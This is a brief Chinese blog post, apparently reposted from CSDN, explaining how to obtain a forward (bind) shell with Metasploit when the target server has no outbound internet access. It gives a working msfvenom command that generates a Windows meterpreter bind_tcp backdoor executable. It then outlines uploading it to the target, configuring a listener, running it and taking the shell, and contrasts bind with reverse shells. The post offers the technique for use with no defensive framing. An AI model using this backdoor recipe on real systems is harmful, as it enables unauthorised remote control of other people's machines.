msf之正向shell的使用

场景:经常使用msf生成后门文件获取shell,但是经常使用的都是反弹shell,reverse_tcp。突然之间遇到了一个场景,由于目标服务器不能出网,只能使用正向shell,这时才发现,自己对于正向shell,一无所知。

1,生成正向shell后门文件

msfvenom -p windows/meterpreter/bind_tcp -f exe -o shy.exe

2,上传到目标机器上

3.配置监听(很重要)

4,运行目标机上的后门文件,获取shell

1,2是正向shell,是我们去主动连接了目标机的4444端口

3 是反向shell,是目标机主动连接了我们的IP的1031端口

猜你喜欢

转载自blog.csdn.net/qq_32393893/article/details/108844370